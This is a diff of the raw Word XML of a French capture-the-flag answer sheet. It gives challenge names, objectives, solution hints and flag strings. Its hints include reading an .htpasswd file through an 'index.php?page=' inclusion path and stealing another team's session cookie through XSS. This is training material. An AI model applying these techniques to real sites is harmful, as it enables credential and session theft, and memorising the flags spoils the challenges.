-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Paragraphedeliste"/>
-        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="1065"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4EA02A7C" wp14:editId="718AB02C">
-            <wp:extent cx="5029200" cy="1704975"/>
-            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
-            <wp:docPr id="18" name="Image 18"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="1" name=""/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId28"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="5029200" cy="1704975"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Solution : </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>Analyser l’arborescence et accéder au .</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>htpasswd</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>index.php?page</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>=admin/.</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>htpasswd</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Flag de la faille A : </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>M0nmdp$ecure123htpasswd</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Flag de la faille B : </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>C3siteE$tpasSecur3</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Paragraphedeliste"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="21"/>
-        </w:numPr>
-        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:br w:type="page"/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Paragraphedeliste"/>
-        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="1065"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Nom de la faille :</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>http-023</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Catégorie de la faille </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>http</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Objectif de la faille : </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">XSS </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>TeamA</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> vs </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>TeamB</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>Difficulté de la faille :</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>4</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Description de la faille : </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>Volez le cookie de session de l'autre équipe pour valider le flag</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>Capture d’écran :</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Paragraphedeliste"/>
-        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="1065"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40BA98FB" wp14:editId="518B9A91">
-            <wp:extent cx="5391150" cy="4114800"/>
-            <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="19" name="Image 19"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -12379,6 +10908,1186 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
+                      <a:ext cx="5760720" cy="739140"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Solution : </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>Utiliser la fonction unescape sur la variable pass et utiliser la fonction String fro ; char code encapsulée à l’intérieur.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Flag de la faille A : </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>hDufjdki156</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Flag de la faille B : </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>ADufjdki156</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="21"/>
+        </w:numPr>
+        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="1065"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Nom de la faille :</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>http-021</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Catégorie de la faille </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>http</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Objectif de la faille : </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>Include</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
